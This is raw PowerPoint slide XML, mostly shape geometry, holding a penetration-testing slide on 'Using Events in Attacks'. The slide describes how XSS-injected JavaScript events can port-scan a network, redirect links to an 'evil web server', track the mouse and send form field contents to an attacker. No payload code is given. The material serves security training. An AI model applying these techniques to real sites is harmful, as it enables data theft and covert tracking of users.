                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 31"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 31"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 31"/>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71"/>
                  <a:gd name="T53" fmla="*/ 31 w 31"/>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71">
                    <a:moveTo>
                      <a:pt x="0" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>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5160" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="309" y="2499"/>
                <a:ext cx="23" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 70"/>
                  <a:gd name="T4" fmla="*/ 0 w 72"/>
                  <a:gd name="T5" fmla="*/ 0 h 70"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 0 h 70"/>
                  <a:gd name="T8" fmla="*/ 0 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 0 w 72"/>
                  <a:gd name="T11" fmla="*/ 0 h 70"/>
                  <a:gd name="T12" fmla="*/ 0 w 72"/>
                  <a:gd name="T13" fmla="*/ 0 h 70"/>
                  <a:gd name="T14" fmla="*/ 0 w 72"/>
                  <a:gd name="T15" fmla="*/ 0 h 70"/>
                  <a:gd name="T16" fmla="*/ 0 w 72"/>
                  <a:gd name="T17" fmla="*/ 0 h 70"/>
                  <a:gd name="T18" fmla="*/ 0 w 72"/>
                  <a:gd name="T19" fmla="*/ 0 h 70"/>
                  <a:gd name="T20" fmla="*/ 0 w 72"/>
                  <a:gd name="T21" fmla="*/ 0 h 70"/>
                  <a:gd name="T22" fmla="*/ 0 w 72"/>
                  <a:gd name="T23" fmla="*/ 0 h 70"/>
                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                  <a:gd name="T25" fmla="*/ 0 h 70"/>
                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                  <a:gd name="T27" fmla="*/ 0 h 70"/>
                  <a:gd name="T28" fmla="*/ 0 w 72"/>
                  <a:gd name="T29" fmla="*/ 0 h 70"/>
                  <a:gd name="T30" fmla="*/ 0 w 72"/>
                  <a:gd name="T31" fmla="*/ 0 h 70"/>
                  <a:gd name="T32" fmla="*/ 0 w 72"/>
                  <a:gd name="T33" fmla="*/ 0 h 70"/>
                  <a:gd name="T34" fmla="*/ 0 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 70"/>
                  <a:gd name="T36" fmla="*/ 0 w 72"/>
                  <a:gd name="T37" fmla="*/ 0 h 70"/>
                  <a:gd name="T38" fmla="*/ 0 w 72"/>
                  <a:gd name="T39" fmla="*/ 0 h 70"/>
                  <a:gd name="T40" fmla="*/ 0 w 72"/>
                  <a:gd name="T41" fmla="*/ 0 h 70"/>
                  <a:gd name="T42" fmla="*/ 0 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 70"/>
                  <a:gd name="T44" fmla="*/ 0 w 72"/>
                  <a:gd name="T45" fmla="*/ 0 h 70"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 0 h 70"/>
                  <a:gd name="T48" fmla="*/ 0 w 72"/>
                  <a:gd name="T49" fmla="*/ 0 h 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70"/>
                  <a:gd name="T77" fmla="*/ 72 w 72"/>
                  <a:gd name="T78" fmla="*/ 70 h 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70">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19"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5161" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="310" y="2485"/>
                <a:ext cx="5" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 0 h 30"/>
                  <a:gd name="T2" fmla="*/ 0 w 16"/>
                  <a:gd name="T3" fmla="*/ 0 h 30"/>
                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                  <a:gd name="T5" fmla="*/ 0 h 30"/>
                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                  <a:gd name="T7" fmla="*/ 0 h 30"/>
                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                  <a:gd name="T9" fmla="*/ 0 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 w 16"/>
                  <a:gd name="T11" fmla="*/ 0 h 30"/>
                  <a:gd name="T12" fmla="*/ 0 w 16"/>
                  <a:gd name="T13" fmla="*/ 0 h 30"/>
                  <a:gd name="T14" fmla="*/ 0 w 16"/>
                  <a:gd name="T15" fmla="*/ 0 h 30"/>
                  <a:gd name="T16" fmla="*/ 0 w 16"/>
                  <a:gd name="T17" fmla="*/ 0 h 30"/>
                  <a:gd name="T18" fmla="*/ 0 w 16"/>
                  <a:gd name="T19" fmla="*/ 0 h 30"/>
                  <a:gd name="T20" fmla="*/ 0 w 16"/>
                  <a:gd name="T21" fmla="*/ 0 h 30"/>
                  <a:gd name="T22" fmla="*/ 0 w 16"/>
                  <a:gd name="T23" fmla="*/ 0 h 30"/>
                  <a:gd name="T24" fmla="*/ 0 w 16"/>
                  <a:gd name="T25" fmla="*/ 0 h 30"/>
                  <a:gd name="T26" fmla="*/ 0 w 16"/>
                  <a:gd name="T27" fmla="*/ 0 h 30"/>
                  <a:gd name="T28" fmla="*/ 0 w 16"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 0 w 16"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 0 w 16"/>
                  <a:gd name="T33" fmla="*/ 0 h 30"/>
                  <a:gd name="T34" fmla="*/ 0 w 16"/>
                  <a:gd name="T35" fmla="*/ 0 h 30"/>
                  <a:gd name="T36" fmla="*/ 0 w 16"/>
                  <a:gd name="T37" fmla="*/ 0 h 30"/>
                  <a:gd name="T38" fmla="*/ 0 w 16"/>
                  <a:gd name="T39" fmla="*/ 0 h 30"/>
                  <a:gd name="T40" fmla="*/ 0 w 16"/>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
                  <a:gd name="T64" fmla="*/ 0 h 30"/>
                  <a:gd name="T65" fmla="*/ 16 w 16"/>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 h="30">
                    <a:moveTo>
                      <a:pt x="7" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3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grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5135"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72200" y="2133600"/>
            <a:ext cx="609600" cy="871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36"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10400" y="5181600"/>
            <a:ext cx="609600" cy="871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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using Events in Attacks:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>More Ideas for Pen Testers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1905000"/>
            <a:ext cx="5181600" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Additional events useful to penetration testers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Used within web scanners injected via XSS to determine a resource does not exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Useful when port scanning a network through JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Change where a link points without the user knowing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Track the movement of the mouse across a page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>onblur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Send the contents of a form field to an attacker </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="3876675"/>
            <a:ext cx="1219200" cy="2219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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>onclick  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>event fires, the JavaScript changes the location of the anchor to point to the evil web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6150" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5870575" y="5715000"/>
            <a:ext cx="792163" cy="493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Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6151" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6765132" y="3979068"/>
            <a:ext cx="1447800" cy="347663"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6152" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7021513" y="3048000"/>
            <a:ext cx="1335087" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Evil Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6153" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5648325" y="2971800"/>
            <a:ext cx="1020763" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6154" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5676900" y="3695700"/>
            <a:ext cx="1676400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6155" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5532120" y="3846513"/>
            <a:ext cx="990600" cy="942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400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Web page returns with XSS code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6156" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7294563" y="3962400"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6157" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="4038600"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6158" name="Group 86"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="1752600"/>
            <a:ext cx="892175" cy="1309688"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6146" name="Object 20"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="228" y="1003"/>
            <a:ext cx="324" cy="338"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s278566" name="Clip" r:id="rId4" imgW="2501798" imgH="2616098" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="2501798" imgH="2616098"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 y="1003"/>
                          <a:ext cx="324" cy="338"/>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6161" name="Rectangle 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="327" y="1041"/>
              <a:ext cx="121" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0043"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0043"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6162" name="Group 89"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6163" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="288" y="2254"/>
                <a:ext cx="528" cy="338"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1616"/>
                  <a:gd name="T1" fmla="*/ 0 h 1034"/>
                  <a:gd name="T2" fmla="*/ 0 w 1616"/>
                  <a:gd name="T3" fmla="*/ 0 h 1034"/>
                  <a:gd name="T4" fmla="*/ 0 w 1616"/>
                  <a:gd name="T5" fmla="*/ 0 h 1034"/>
                  <a:gd name="T6" fmla="*/ 0 w 1616"/>
                  <a:gd name="T7" fmla="*/ 0 h 1034"/>
                  <a:gd name="T8" fmla="*/ 0 w 1616"/>
                  <a:gd name="T9" fmla="*/ 0 h 1034"/>
                  <a:gd name="T10" fmla="*/ 0 w 1616"/>
                  <a:gd name="T11" fmla="*/ 0 h 1034"/>
                  <a:gd name="T12" fmla="*/ 0 w 1616"/>
                  <a:gd name="T13" fmla="*/ 0 h 1034"/>
                  <a:gd name="T14" fmla="*/ 0 w 1616"/>
